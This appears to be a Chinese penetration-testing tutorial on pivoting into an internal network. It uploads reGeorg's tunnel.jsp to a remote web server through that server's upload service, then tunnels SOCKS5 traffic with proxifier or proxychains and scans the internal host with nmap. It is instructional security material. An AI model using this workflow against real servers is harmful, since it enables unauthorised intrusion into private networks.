目录(?)[-]
一 windows环境reGeorg与proxifier
1 搭建reGeorg运行环境python
2 安装reGeorg
3 使用reGeorg开启socks5反向代理服务
4 利用proxifier进行socks5代理
二 Linuxkali-linux环境reGeorg与proxychains
1 安装reGeorg
2 使用reGeorg开启socks5反向代理服务
3 利用proxychains进行socks5代理
三 附录
本文描述:渗透测试中,windows/Linux环境下,使用代理访问内网服务器。
环境:
本地Windows的IP: 172.18.5.26
本地Linux的IP:172.18.5.116
远程公网IP: 221.6.25.208
远程公网221.6.25.208映射的内网服务器ip:172.20.1.3
其中,可通过221.6.25.208:80端口提供的服务上传文件至172.20.1.3
一、 windows环境:reGeorg与proxifier
1.1 搭建reGeorg运行环境python
1.1.1 按照自己系统的环境,在 https://www.python.org/downloads/windows/下载对应的Python
1.1.2 安装完后验证python是否安装成功:命令提示符下敲Python –version
至此,Python基本的安装完成了。
1.2 安装reGeorg
1.2.1 下载reGeorg-master (https://github.com/sensepost/reGeorg),Copy到 C:\Python27\ 。
1.2.2 安装setuptools
(a)下载ez_setup.py(https://pypi.python.org/pypi/setuptools#windows-simplified),Copy到 C:\Python27\ 。
(b)在命令提示符下切换到C:\Python27\,依次运行如下命令
python ez_setup.py build
python ez_setup.py install
看到 Finished就可以了,表示setuptools安装成功。
1.2.3 安装Pip
(a)下载地址http://pypi.python.org/packages/source/p/pip/pip-1.0.tar.gz ,解压,目录现在可以随便放了,因为刚刚安装了setuptools了.
(b) 依次运行如下命令
python setup.py build
python setup.py install
看到 Finished就可以了,表示Pip安装成功。
1.2.4 安装urllib3。(urllib3是reGeorg开启代理必需的模块)
在命令提示符下切换到C:\Python27\Scripts,直接运行pip install urllib3 。
至此,reGeorg安装完成。
1.3 使用reGeorg开启socks5反向代理服务
1.3.1 上传反向代理服务端至远程主机
通过221.6.25.208:80端口提供的服务,上传C:\Python27\reGeorg-master目录下tunnel.jsp文件至远程目标机。
1.3.2 开启socks5反向代理服务
在172.18.5.26命令提示符下切换到C:\Python27\reGeorg-master,运行如下命令:
python reGeorgSocksProxy.py -p 2333 -u http://221.6.25.208/tunnel.jsp
其中,最好使用-l参数修改默认的127.0.0.1为0.0.0.0;-p 2333用于指定监听172.18.5.26的2333端口。
(python reGeorgSocksProxy.py -l 0.0.0.0 -p 2333 -u http://221.6.25.208/tunnel.jsp)
至此,已使用reGeorg开启socks5反向代理服务。
1.4 利用proxifier进行socks5代理
1.4.1 下载安装运行proxifier,即可进行socks5代理。
至此,利用proxifier进行socks5代理已完成。
1.4.2 proxifier使用注意事项
(a)Direct表示不使用socks5代理,直接请求;Block表示阻断请求;Proxy Socks5表示使用socks5代理服务。
(b)默认宜不使用Proxy Socks5,仅对需要的程序使用Socks5代理服务。
(c)添加某应用的所有程序
比如在windows环境下,使用zenmap进行远程内网机器的端口扫描时,需要添加的应用程序有zenmap.exe和nmap.exe,如下图所示:
另外,在使用namp时,注意添加-Pn参数,否则显示host down;
注意使用-sT扫描,使用-sS扫描时,端口状态为filterd。
二、 Linux(kali-linux)环境:reGeorg与proxychains
2.1 安装reGeorg
参考1.2
2.2 使用reGeorg开启socks5反向代理服务
参考1.3
2.3 利用proxychains进行socks5代理
2.3.1 kali-linux默认已安装proxychains3
2.3.2 修改proxychains配置
编辑/etc/proxychains.conf文件,将socks4 127.0.0.1 9050改为:socks5 127.0.0.1 2333
至此,利用proxychains进行socks5代理已完成
2.3.4 使用方法
proxychains 工具 工具参数
例如:使用命令:proxychains firefox,可以使用浏览器访问远程内网服务器172.20.1.3。
三、 附录
参考:
reGeorg-master图文安装方法:
http://blog.okbase.net/webvul/archive/4599.html
如何实现Proxifier只代理部分程序:
http://jingyan.baidu.com/article/48b558e35e12f97f38c09a28.html
Socks代理反弹突破内网
http://www.freebuf.com/articles/system/12182.html